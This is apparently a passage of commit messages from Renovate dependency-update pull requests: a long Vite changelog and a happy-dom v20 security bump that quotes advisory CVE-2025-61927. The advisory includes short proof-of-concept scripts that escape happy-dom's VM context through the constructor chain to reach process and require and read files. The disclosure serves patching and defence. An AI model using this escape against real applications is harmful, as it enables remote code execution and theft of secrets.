rollup options ([#​20375](https://redirect.github.com/vitejs/vite/issues/20375)) ([61a9778](https://redirect.github.com/vitejs/vite/commit/61a97780e6c54adb87345cb8c1f5f0d8e9ca5c05)) - rewrite openchrome.applescript to JXA ([#​20424](https://redirect.github.com/vitejs/vite/issues/20424)) ([7979f9d](https://redirect.github.com/vitejs/vite/commit/7979f9da555aa16bd221b32ea78ce8cb5292fac4)) - use `http-proxy-3` ([#​20402](https://redirect.github.com/vitejs/vite/issues/20402)) ([26d9872](https://redirect.github.com/vitejs/vite/commit/26d987232aad389733a7635b92122bb1d78dfcad)) - use hook filters in internal plugins ([#​20358](https://redirect.github.com/vitejs/vite/issues/20358)) ([f19c4d7](https://redirect.github.com/vitejs/vite/commit/f19c4d72de142814994e30120aa4ad57552cb874)) - use hook filters in internal resolve plugin ([#​20480](https://redirect.github.com/vitejs/vite/issues/20480)) ([acd2a13](https://redirect.github.com/vitejs/vite/commit/acd2a13c2d80e8c5c721bcf9738dfc03346cbfe1)) ##### Tests - detect ts support via `process.features` ([#​20544](https://redirect.github.com/vitejs/vite/issues/20544)) ([856d3f0](https://redirect.github.com/vitejs/vite/commit/856d3f06e6889979f630c8453fa385f01d8adaba)) - fix unimportant errors in test-unit ([#​20545](https://redirect.github.com/vitejs/vite/issues/20545)) ([1f23554](https://redirect.github.com/vitejs/vite/commit/1f235545b14a51d41b19a49da4a7e3a8e8eb5d10)) ##### Beta Changelogs ##### [7.1.0-beta.1](https://redirect.github.com/vitejs/vite/compare/v7.1.0-beta.0...v7.1.0-beta.1) (2025-08-05) See [7.1.0-beta.1 changelog](https://redirect.github.com/vitejs/vite/blob/v7.1.0-beta.1/packages/vite/CHANGELOG.md) ##### [7.1.0-beta.0](https://redirect.github.com/vitejs/vite/compare/v7.0.6...v7.1.0-beta.0) (2025-07-30) See [7.1.0-beta.0 changelog](https://redirect.github.com/vitejs/vite/blob/v7.1.0-beta.0/packages/vite/CHANGELOG.md) ### [`v7.0.8`](https://redirect.github.com/vitejs/vite/releases/tag/v7.0.8) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.0.7...v7.0.8) Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v7.0.8/packages/vite/CHANGELOG.md) for details. ### [`v7.0.7`](https://redirect.github.com/vitejs/vite/releases/tag/v7.0.7) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.0.6...v7.0.7) Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v7.0.7/packages/vite/CHANGELOG.md) for details. ### [`v7.0.6`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#710-2025-08-07) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.0.5...v7.0.6) ##### Features - support files with more than 1000 lines by `generateCodeFrame` ([#​20508](https://redirect.github.com/vitejs/vite/issues/20508)) ([e7d0b2a](https://redirect.github.com/vitejs/vite/commit/e7d0b2afa56840dabbbad10015dc04083caaf248)) - add `import.meta.main` support in config (bundle config loader) ([#​20516](https://redirect.github.com/vitejs/vite/issues/20516)) ([5d3e3c2](https://redirect.github.com/vitejs/vite/commit/5d3e3c2ae5a2174941fd09fd7842794a287c3ab7)) - **optimizer:** improve dependency optimization error messages with esbuild formatMessages ([#​20525](https://redirect.github.com/vitejs/vite/issues/20525)) ([d17cfed](https://redirect.github.com/vitejs/vite/commit/d17cfeda0741e4476570700a00b7b37917c97700)) - **ssr:** add `import.meta.main` support for Node.js module runner ([#​20517](https://redirect.github.com/vitejs/vite/issues/20517)) ([794a8f2](https://redirect.github.com/vitejs/vite/commit/794a8f230218a3b1e148defc5a2d7a67409177ff)) - add `future: 'warn'` ([#​20473](https://redirect.github.com/vitejs/vite/issues/20473)) ([e6aaf17](https://redirect.github.com/vitejs/vite/commit/e6aaf17ca21544572941957ce71bd8dbdc94e402)) - add `removeServerPluginContainer` future deprecation ([#​20437](https://redirect.github.com/vitejs/vite/issues/20437)) ([c1279e7](https://redirect.github.com/vitejs/vite/commit/c1279e75401ac6ea1d0678da88414a76ff36b6fe)) - add `removeServerReloadModule` future deprecation ([#​20436](https://redirect.github.com/vitejs/vite/issues/20436)) ([6970d17](https://redirect.github.com/vitejs/vite/commit/6970d1740cebd56af696abf60f30adb0c060f578)) - add `server.warmupRequest` to future deprecation ([#​20431](https://redirect.github.com/vitejs/vite/issues/20431)) ([8ad388a](https://redirect.github.com/vitejs/vite/commit/8ad388aeab0dc79e4bc14859b91174427805a46b)) - add `ssrFixStacktrace` / `ssrRewriteStacktrace` to `removeSsrLoadModule` future deprecation ([#​20435](https://redirect.github.com/vitejs/vite/issues/20435)) ([8c8f587](https://redirect.github.com/vitejs/vite/commit/8c8f5879ead251705c2c363f5b8b94f618fbf374)) - **client:** ping from SharedWorker ([#​19057](https://redirect.github.com/vitejs/vite/issues/19057)) ([5c97c22](https://redirect.github.com/vitejs/vite/commit/5c97c22548476e5f80856ece1d80b9234a7e6ecb)) - **dev:** add `this.fs` support ([#​20301](https://redirect.github.com/vitejs/vite/issues/20301)) ([0fe3f2f](https://redirect.github.com/vitejs/vite/commit/0fe3f2f7c325c5990f1059c28b66b24e1b8fd5d3)) - export `defaultExternalConditions` ([#​20279](https://redirect.github.com/vitejs/vite/issues/20279)) ([344d302](https://redirect.github.com/vitejs/vite/commit/344d30243b107852b133175e947a0410ea703f00)) - implement `removePluginHookSsrArgument` future deprecation ([#​20433](https://redirect.github.com/vitejs/vite/issues/20433)) ([95927d9](https://redirect.github.com/vitejs/vite/commit/95927d9c0ba1cb0b3bd8c900f039c099f8e29f90)) - implement `removeServerHot` future deprecation ([#​20434](https://redirect.github.com/vitejs/vite/issues/20434)) ([259f45d](https://redirect.github.com/vitejs/vite/commit/259f45d0698a184d6ecc352b610001fa1acdcee1)) - resolve server URLs before calling other listeners ([#​19981](https://redirect.github.com/vitejs/vite/issues/19981)) ([45f6443](https://redirect.github.com/vitejs/vite/commit/45f6443a935258d8eee62874f0695b8c1c60a481)) - **ssr:** resolve externalized packages with `resolve.externalConditions` and add `module-sync` to default external condition ([#​20409](https://redirect.github.com/vitejs/vite/issues/20409)) ([c669c52](https://redirect.github.com/vitejs/vite/commit/c669c524e6008a4902169f4b2f865e892297acf3)) - **ssr:** support `import.meta.resolve` in module runner ([#​20260](https://redirect.github.com/vitejs/vite/issues/20260)) ([62835f7](https://redirect.github.com/vitejs/vite/commit/62835f7c06d37802f0bc2abbf58bbaeaa8c73ce5)) ##### Bug Fixes - **css:** avoid warnings for `image-set` containing `__VITE_ASSET__` ([#​20520](https://redirect.github.com/vitejs/vite/issues/20520)) ([f1a2635](https://redirect.github.com/vitejs/vite/commit/f1a2635e6977a3eda681bec036f64f07686dad0d)) - **css:** empty CSS entry points should generate CSS files, not JS files ([#​20518](https://redirect.github.com/vitejs/vite/issues/20518)) ([bac9f3e](https://redirect.github.com/vitejs/vite/commit/bac9f3ecf84ae5c5add6ef224ae057508247f89e)) - **dev:** denied request stalled when requested concurrently ([#​20503](https://redirect.github.com/vitejs/vite/issues/20503)) ([64a52e7](https://redirect.github.com/vitejs/vite/commit/64a52e70d9250b16aa81ce2df27c23fe56907257)) - **manifest:** initialize `entryCssAssetFileNames` as an empty Set ([#​20542](https://redirect.github.com/vitejs/vite/issues/20542)) ([6a46cda](https://redirect.github.com/vitejs/vite/commit/6a46cdac5dece70296d1179640958deeeb2e6c19)) - skip prepareOutDirPlugin in workers ([#​20556](https://redirect.github.com/vitejs/vite/issues/20556)) ([97d5111](https://redirect.github.com/vitejs/vite/commit/97d5111645a395dae48b16b110bc76c1ee8956c8)) - **asset:** only watch existing files for `new URL(, import.meta.url)` ([#​20507](https://redirect.github.com/vitejs/vite/issues/20507)) ([1b211fd](https://redirect.github.com/vitejs/vite/commit/1b211fd1beccd0fc13bec700815abaa9f54147e8)) - **client:** keep ping on WS constructor error ([#​20512](https://redirect.github.com/vitejs/vite/issues/20512)) ([3676da5](https://redirect.github.com/vitejs/vite/commit/3676da5bc5b2b69b28619b8521fca94d30468fe5)) - **deps:** update all non-major dependencies ([#​20537](https://redirect.github.com/vitejs/vite/issues/20537)) ([fc9a9d3](https://redirect.github.com/vitejs/vite/commit/fc9a9d3f1493caa3d614f64e0a61fd5684f0928b)) - don't resolve as relative for specifiers starting with a dot ([#​20528](https://redirect.github.com/vitejs/vite/issues/20528)) ([c5a10ec](https://redirect.github.com/vitejs/vite/commit/c5a10ec004130bec17cf42760b76d1d404008fa3)) - **html:** allow control character in input stream ([#​20483](https://redirect.github.com/vitejs/vite/issues/20483)) ([c12a4a7](https://redirect.github.com/vitejs/vite/commit/c12a4a76a299237a0a13b885c72fdda6e4a3c9b7)) - merge old and new `noExternal: true` correctly ([#​20502](https://redirect.github.com/vitejs/vite/issues/20502)) ([9ebe4a5](https://redirect.github.com/vitejs/vite/commit/9ebe4a514a2e48e3fe194f16b0556a45ff38077a)) - **deps:** update all non-major dependencies ([#​20489](https://redirect.github.com/vitejs/vite/issues/20489)) ([f6aa04a](https://redirect.github.com/vitejs/vite/commit/f6aa04a52d486c8881f666c450caa3dab3c6bba1)) - **dev:** denied requests overly ([#​20410](https://redirect.github.com/vitejs/vite/issues/20410)) ([4be5270](https://redirect.github.com/vitejs/vite/commit/4be5270b27f7e6323f1771974b4b3520d86600e4)) - **hmr:** register css deps as `type: asset` ([#​20391](https://redirect.github.com/vitejs/vite/issues/20391)) ([7eac8dd](https://redirect.github.com/vitejs/vite/commit/7eac8ddb65033b8c001d6c6bc46aaeeefb79680a)) - **optimizer:** discover correct jsx runtime during scan ([#​20495](https://redirect.github.com/vitejs/vite/issues/20495)) ([10d48bb](https://redirect.github.com/vitejs/vite/commit/10d48bb2e30824d217e415a58cea9e69c2820c2a)) - **preview:** set correct host for `resolvedUrls` ([#​20496](https://redirect.github.com/vitejs/vite/issues/20496)) ([62b3e0d](https://redirect.github.com/vitejs/vite/commit/62b3e0d95c143e2f8b4e88d99c381d23663025ee)) - **worker:** resolve WebKit compat with inline workers by deferring blob URL revocation ([#​20460](https://redirect.github.com/vitejs/vite/issues/20460)) ([8033e5b](https://redirect.github.com/vitejs/vite/commit/8033e5bf8d3ff43995d0620490ed8739c59171dd)) ##### Performance Improvements - **client:** reduce reload debounce ([#​20429](https://redirect.github.com/vitejs/vite/issues/20429)) ([22ad43b](https://redirect.github.com/vitejs/vite/commit/22ad43b4bf2435efe78a65b84e8469b23521900a)) ##### Miscellaneous Chores - **deps:** update rolldown-related dependencies ([#​20536](https://redirect.github.com/vitejs/vite/issues/20536)) ([8be2787](https://redirect.github.com/vitejs/vite/commit/8be278748a92b128c49a24619d8d537dd2b08ceb)) - **deps:** update dependency parse5 to v8 ([#​20490](https://redirect.github.com/vitejs/vite/issues/20490)) ([744582d](https://redirect.github.com/vitejs/vite/commit/744582d0187c50045fb6cf229e3fab13093af08e)) - format ([f20addc](https://redirect.github.com/vitejs/vite/commit/f20addc5363058f5fd797e5bc71fab3877ed0a76)) - stablize `cssScopeTo` ([#​19592](https://redirect.github.com/vitejs/vite/issues/19592)) ([ced1343](https://redirect.github.com/vitejs/vite/commit/ced13433fb71e2101850a4da1b0ef70cbc38b804)) ##### Code Refactoring - use hook filters in the worker plugin ([#​20527](https://redirect.github.com/vitejs/vite/issues/20527)) ([958cdf2](https://redirect.github.com/vitejs/vite/commit/958cdf24f882be6953ca20912dd30c84213b069b)) - extract prepareOutDir as a plugin ([#​20373](https://redirect.github.com/vitejs/vite/issues/20373)) ([2c4af1f](https://redirect.github.com/vitejs/vite/commit/2c4af1f90b3ac98df6f4585a329528e6bd850462)) - extract resolve rollup options ([#​20375](https://redirect.github.com/vitejs/vite/issues/20375)) ([61a9778](https://redirect.github.com/vitejs/vite/commit/61a97780e6c54adb87345cb8c1f5f0d8e9ca5c05)) - rewrite openchrome.applescript to JXA ([#​20424](https://redirect.github.com/vitejs/vite/issues/20424)) ([7979f9d](https://redirect.github.com/vitejs/vite/commit/7979f9da555aa16bd221b32ea78ce8cb5292fac4)) - use `http-proxy-3` ([#​20402](https://redirect.github.com/vitejs/vite/issues/20402)) ([26d9872](https://redirect.github.com/vitejs/vite/commit/26d987232aad389733a7635b92122bb1d78dfcad)) - use hook filters in internal plugins ([#​20358](https://redirect.github.com/vitejs/vite/issues/20358)) ([f19c4d7](https://redirect.github.com/vitejs/vite/commit/f19c4d72de142814994e30120aa4ad57552cb874)) - use hook filters in internal resolve plugin ([#​20480](https://redirect.github.com/vitejs/vite/issues/20480)) ([acd2a13](https://redirect.github.com/vitejs/vite/commit/acd2a13c2d80e8c5c721bcf9738dfc03346cbfe1)) ##### Tests - detect ts support via `process.features` ([#​20544](https://redirect.github.com/vitejs/vite/issues/20544)) ([856d3f0](https://redirect.github.com/vitejs/vite/commit/856d3f06e6889979f630c8453fa385f01d8adaba)) - fix unimportant errors in test-unit ([#​20545](https://redirect.github.com/vitejs/vite/issues/20545)) ([1f23554](https://redirect.github.com/vitejs/vite/commit/1f235545b14a51d41b19a49da4a7e3a8e8eb5d10)) ##### Beta Changelogs ##### [7.1.0-beta.1](https://redirect.github.com/vitejs/vite/compare/v7.1.0-beta.0...v7.1.0-beta.1) (2025-08-05) See [7.1.0-beta.1 changelog](https://redirect.github.com/vitejs/vite/blob/v7.1.0-beta.1/packages/vite/CHANGELOG.md) ##### [7.1.0-beta.0](https://redirect.github.com/vitejs/vite/compare/v7.0.6...v7.1.0-beta.0) (2025-07-30) See [7.1.0-beta.0 changelog](https://redirect.github.com/vitejs/vite/blob/v7.1.0-beta.0/packages/vite/CHANGELOG.md) ### [`v7.0.5`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-705-2025-07-17-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.0.4...v7.0.5) ##### Bug Fixes - **deps:** update all non-major dependencies ([#​20406](https://redirect.github.com/vitejs/vite/issues/20406)) ([1a1cc8a](https://redirect.github.com/vitejs/vite/commit/1a1cc8a435a21996255b3e5cc75ed4680de2a7f3)) - remove special handling for `Accept: text/html` ([#​20376](https://redirect.github.com/vitejs/vite/issues/20376)) ([c9614b9](https://redirect.github.com/vitejs/vite/commit/c9614b9c378be4a32e84f37be71a8becce52af7b)) - watch assets referenced by `new URL(, import.meta.url)` ([#​20382](https://redirect.github.com/vitejs/vite/issues/20382)) ([6bc8bf6](https://redirect.github.com/vitejs/vite/commit/6bc8bf634d4a2c9915da9813963dd80a4186daeb)) ##### Miscellaneous Chores - **deps:** update dependency rolldown to ^1.0.0-beta.27 ([#​20405](https://redirect.github.com/vitejs/vite/issues/20405)) ([1165667](https://redirect.github.com/vitejs/vite/commit/1165667b271fb1fb76584278e72a85d564c9bb09)) ##### Code Refactoring - use `foo.endsWith("bar")` instead of `/bar$/.test(foo)` ([#​20413](https://redirect.github.com/vitejs/vite/issues/20413)) ([862e192](https://redirect.github.com/vitejs/vite/commit/862e192d21f66039635a998724bdc6b94fd293a0)) ### [`v7.0.4`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-704-2025-07-10-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.0.3...v7.0.4) ##### Bug Fixes - allow resolving bare specifiers to relative paths for entries ([#​20379](https://redirect.github.com/vitejs/vite/issues/20379)) ([324669c](https://redirect.github.com/vitejs/vite/commit/324669c2d84966a822b1b2c134c9830a90bed271)) ##### Build System - remove `@oxc-project/runtime` devDep ([#​20389](https://redirect.github.com/vitejs/vite/issues/20389)) ([5e29602](https://redirect.github.com/vitejs/vite/commit/5e29602f6fe4bf28f6e7c869a214dee6957f855c)) ### [`v7.0.3`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-703-2025-07-08-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.0.2...v7.0.3) ##### Bug Fixes - **client:** protect against window being defined but addEv undefined ([#​20359](https://redirect.github.com/vitejs/vite/issues/20359)) ([31d1467](https://redirect.github.com/vitejs/vite/commit/31d1467cf0da1e1dca623e6df0d345b30fae0c3d)) - **define:** replace optional values ([#​20338](https://redirect.github.com/vitejs/vite/issues/20338)) ([9465ae1](https://redirect.github.com/vitejs/vite/commit/9465ae1378b456e08659a22286bee6bce8edeedc)) - **deps:** update all non-major dependencies ([#​20366](https://redirect.github.com/vitejs/vite/issues/20366)) ([43ac73d](https://redirect.github.com/vitejs/vite/commit/43ac73da27b3907c701e95e6a7d28fde659729ec)) ##### Miscellaneous Chores - **deps:** update dependency dotenv to v17 ([#​20325](https://redirect.github.com/vitejs/vite/issues/20325)) ([45040d4](https://redirect.github.com/vitejs/vite/commit/45040d48076302eeb101f8d07bbcd04758fde8a4)) - **deps:** update dependency rolldown to ^1.0.0-beta.24 ([#​20365](https://redirect.github.com/vitejs/vite/issues/20365)) ([5ab25e7](https://redirect.github.com/vitejs/vite/commit/5ab25e73a2ea2a2e2c0469350288a183dfb57030)) - use `n/prefer-node-protocol` rule ([#​20368](https://redirect.github.com/vitejs/vite/issues/20368)) ([38bb268](https://redirect.github.com/vitejs/vite/commit/38bb268cde15541321f36016e77d61eecb707298)) ##### Code Refactoring - minor changes to reduce diff between normal Vite and rolldown-vite ([#​20354](https://redirect.github.com/vitejs/vite/issues/20354)) ([2e8050e](https://redirect.github.com/vitejs/vite/commit/2e8050e4cd8835673baf07375b7db35128144222)) ### [`v7.0.2`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-702-2025-07-04-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.0.1...v7.0.2) ##### Bug Fixes - **css:** resolve relative paths in sass, revert [#​20300](https://redirect.github.com/vitejs/vite/issues/20300) ([#​20349](https://redirect.github.com/vitejs/vite/issues/20349)) ([db8bd41](https://redirect.github.com/vitejs/vite/commit/db8bd412a8b783fe8e9f82d1a822b0534abbf5a3)) ### [`v7.0.1`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-701-2025-07-03-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.0.0...v7.0.1) ##### Bug Fixes - **css:** skip resolving resolved paths in sass ([#​20300](https://redirect.github.com/vitejs/vite/issues/20300)) ([ac528a4](https://redirect.github.com/vitejs/vite/commit/ac528a44c384fefb6f10c3f531df93b5ac39324c)) - **deps:** update all non-major dependencies ([#​20324](https://redirect.github.com/vitejs/vite/issues/20324)) ([3e81af3](https://redirect.github.com/vitejs/vite/commit/3e81af38a80c7617aba6bf3300d8b4267570f9cf)) - **types:** add a global interface for Worker ([#​20243](https://redirect.github.com/vitejs/vite/issues/20243)) ([37bdfc1](https://redirect.github.com/vitejs/vite/commit/37bdfc18f4c5bed053a38c5d717df33036acdd62)) ##### Miscellaneous Chores - **deps:** update rolldown-related dependencies ([#​20323](https://redirect.github.com/vitejs/vite/issues/20323)) ([30d2f1b](https://redirect.github.com/vitejs/vite/commit/30d2f1b38c72387ffdca3ee4746730959a020b59)) - fix typos and grammatical errors across documentation and comments ([#​20337](https://redirect.github.com/vitejs/vite/issues/20337)) ([c1c951d](https://redirect.github.com/vitejs/vite/commit/c1c951dcc32ec9f133b03ebbceddd749fc14f1e9)) - group commits by category in changelog ([#​20310](https://redirect.github.com/vitejs/vite/issues/20310)) ([41e83f6](https://redirect.github.com/vitejs/vite/commit/41e83f62b1adb65f5af4c1ec006de1c845437edc)) - rearrange 7.0 changelog ([#​20280](https://redirect.github.com/vitejs/vite/issues/20280)) ([eafd28a](https://redirect.github.com/vitejs/vite/commit/eafd28ac88d5908cbc3e0a047ed7a12094386436)) ### [`v7.0.0`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#700-2025-06-24) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v6.4.1...v7.0.0)  Today, we're excited to announce the release of the next Vite major: - **[Vite 7.0 announcement blog post](https://vite.dev/blog/announcing-vite7.html)** - [Docs](https://vite.dev/) (translations: [简体中文](https://cn.vite.dev/), [日本語](https://ja.vite.dev/), [Español](https://es.vite.dev/), [Português](https://pt.vite.dev/), [한국어](https://ko.vite.dev/), [Deutsch](https://de.vite.dev/), [فارسی](https://fa.vite.dev/)) - [Migration Guide](https://vite.dev/guide/migration.html) ##### ⚠ BREAKING CHANGES - **ssr:** don't access `Object` variable in ssr transformed code ([#​19996](https://redirect.github.com/vitejs/vite/issues/19996)) - remove `experimental.skipSsrTransform` option ([#​20038](https://redirect.github.com/vitejs/vite/issues/20038)) - remove `HotBroadcaster` ([#​19988](https://redirect.github.com/vitejs/vite/issues/19988)) - **css:** always use sass compiler API ([#​19978](https://redirect.github.com/vitejs/vite/issues/19978)) - bump `build.target` and name it `baseline-widely-available` ([#​20007](https://redirect.github.com/vitejs/vite/issues/20007)) - bump required node version to 20.19+, 22.12+ and remove cjs build ([#​20032](https://redirect.github.com/vitejs/vite/issues/20032)) - **css:** remove sass legacy API support ([#​19977](https://redirect.github.com/vitejs/vite/issues/19977)) - remove deprecated `HotBroadcaster` related types ([#​19987](https://redirect.github.com/vitejs/vite/issues/19987)) - remove deprecated no-op type only properties ([#​19985](https://redirect.github.com/vitejs/vite/issues/19985)) - remove node 18 support ([#​19972](https://redirect.github.com/vitejs/vite/issues/19972)) - remove deprecated hook-level `enforce`/`transform` from `transformIndexHtml` hook ([#​19349](https://redirect.github.com/vitejs/vite/issues/19349)) - remove deprecated splitVendorChunkPlugin ([#​19255](https://redirect.github.com/vitejs/vite/issues/19255)) ##### Features - **types:** use terser types from terser package ([#​20274](https://redirect.github.com/vitejs/vite/issues/20274)) ([a5799fa](https://redirect.github.com/vitejs/vite/commit/a5799fa74c6190ecbb2da3d280136ff32463afc6)) - apply some middlewares before `configurePreviewServer` hook ([#​20224](https://redirect.github.com/vitejs/vite/issues/20224)) ([b989c42](https://redirect.github.com/vitejs/vite/commit/b989c42cf84378e6cb93970de739941f0d56d6f6)) - apply some middlewares before `configureServer` hook ([#​20222](https://redirect.github.com/vitejs/vite/issues/20222)) ([f5cc4c0](https://redirect.github.com/vitejs/vite/commit/f5cc4c0ded337670b439e51bc95f173e2b5cf9ad)) - add base option to import.meta.glob ([#​20163](https://redirect.github.com/vitejs/vite/issues/20163)) ([253d6c6](https://redirect.github.com/vitejs/vite/commit/253d6c6df2ebe3c4a88dabb6cec000128681561f)) - add `this.meta.viteVersion` ([#​20088](https://redirect.github.com/vitejs/vite/issues/20088)) ([f55bf41](https://redirect.github.com/vitejs/vite/commit/f55bf41e91f8dfe829a46e58f0035b19c8ab6a25)) - allow passing down resolved config to vite's `createServer` ([#​19894](https://redirect.github.com/vitejs/vite/issues/19894)) ([c1ae9bd](https://redirect.github.com/vitejs/vite/commit/c1ae9bd4a0542b4703ae7766ad61d072e8b833bd)) - buildApp hook ([#​19971](https://redirect.github.com/vitejs/vite/issues/19971)) ([5da659d](https://redirect.github.com/vitejs/vite/commit/5da659de902f0a2d6d8beefbf269128383b63887)) - **build:** provide names for asset entrypoints ([#​19912](https://redirect.github.com/vitejs/vite/issues/19912)) ([c4e01dc](https://redirect.github.com/vitejs/vite/commit/c4e01dc5ab0f1708383c39d28ce62e12b8f374fc)) - bump `build.target` and name it `baseline-widely-available` ([#​20007](https://redirect.github.com/vitejs/vite/issues/20007)) ([4a8aa82](https://redirect.github.com/vitejs/vite/commit/4a8aa82556eb2b9e54673a6aac77873e0eb27fa9)) - **client:** support opening fileURL in editor ([#​20040](https://redirect.github.com/vitejs/vite/issues/20040)) ([1bde4d2](https://redirect.github.com/vitejs/vite/commit/1bde4d25243cd9beaadb01413e896fef562626ef)) - make PluginContext available for Vite-specific hooks ([#​19936](https://redirect.github.com/vitejs/vite/issues/19936)) ([7063839](https://redirect.github.com/vitejs/vite/commit/7063839d47dfd4ac6be1247ba68e414ffe287b00)) - resolve environments plugins at config time ([#​20120](https://redirect.github.com/vitejs/vite/issues/20120)) ([f6a28d5](https://redirect.github.com/vitejs/vite/commit/f6a28d5f792ba5cc4dc236e3e6edd05199cabcc8)) - stabilize `css.preprocessorMaxWorkers` and default to `true` ([#​19992](https://redirect.github.com/vitejs/vite/issues/19992)) ([70aee13](https://redirect.github.com/vitejs/vite/commit/70aee139ea802478bad56e5e441f187140bcf0cc)) - stabilize `optimizeDeps.noDiscovery` ([#​19984](https://redirect.github.com/vitejs/vite/issues/19984)) ([6d2dcb4](https://redirect.github.com/vitejs/vite/commit/6d2dcb494db9f40565f11b50bdbb8c1b7245697d)) ##### Bug Fixes - **deps:** update all non-major dependencies ([#​20271](https://redirect.github.com/vitejs/vite/issues/20271)) ([6b64d63](https://redirect.github.com/vitejs/vite/commit/6b64d63d700154de2c00270 </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
50f41c2212 |
chore: bump up happy-dom version to v20 [SECURITY] (#13726)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`^18.0.0` -> `^20.0.0`](https://renovatebot.com/diffs/npm/happy-dom/18.0.1/20.0.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-61927](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f) # Escape of VM Context gives access to process level functionality ## Summary Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. What the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. ## Reproduce ### CommonJS (Possible to get hold of require) ```javascript const { Window } = require('happy-dom'); const window = new Window({ console }); window.document.write(` <script> const process = this.constructor.constructor('return process')(); const require = process.mainModule.require; console.log('Files:', require('fs').readdirSync('.').slice(0,3)); </script> `); ``` ### ESM (Not possible to get hold of import or require) ```javascript const { Window } = require('happy-dom'); const window = new Window({ console }); window.document.write(` <script> const process = this.constructor.constructor('return process')(); console.log('PID:', process.pid); </script> `); ``` ## Potential Impact #### Server-Side Rendering (SSR) ```javascript const { Window } = require('happy-dom'); const window = new Window(); window.document.innerHTML = userControlledHTML; ``` #### Testing Frameworks Any test suite using Happy-DOM with untrusted content may be at risk. ## Attack Scenarios 1. **Data Exfiltration**: Access to environment variables, configuration files, secrets 2. **Lateral Movement**: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.). 3. **Code Execution**: Child process access for running arbitrary commands 4. **Persistence**: File system access ## Recommended Immediate Actions 1. Update Happy DOM to v20 or above - This version has JavaScript evaluation disabled by default - This version will output a warning if JavaScript is enabled in an insecure environment 2. Run Node.js with the "--disallow-code-generation-from-strings" if you need JavaScript evaluation enabled - This makes sure that evaluation can't be used at process level to escape the VM - `eval()` and `Function()` can still be used within the Happy DOM VM without any known security risk - Happy DOM v20 and above will output a warning if this flag is not in use 4. If you can't update Happy DOM right now, it's recommended to disable JavaScript evaluation, unless you completely trust the content within the environment ## Technical Root Cause All classes and functions inherit from [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function). By walking the constructor chain it's possible to get hold of [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) at process level. As [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) can evaluate code from strings, it's possible to execute code at process level. Running Node with the "--disallow-code-generation-from-strings" flag protects against this. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.0`](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...819d15ba289495439eda8be360d92a614ce22405) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...v20.0.0) ### [`v19.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.1...v19.0.2) ##### :construction\_worker\_man: Patch fixes - Fixes issue related to CSS pseudo selector `:scope` that didn't work correctly for direct descendants to root - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620) ### [`v19.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.0...v19.0.1) ##### :construction\_worker\_man: Patch fixes - Fixes issue with sending in URLs as string in `@happy-dom/server-renderer` config using CLI - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1908](https://redirect.github.com/capricorn86/happy-dom/issues/1908) ### 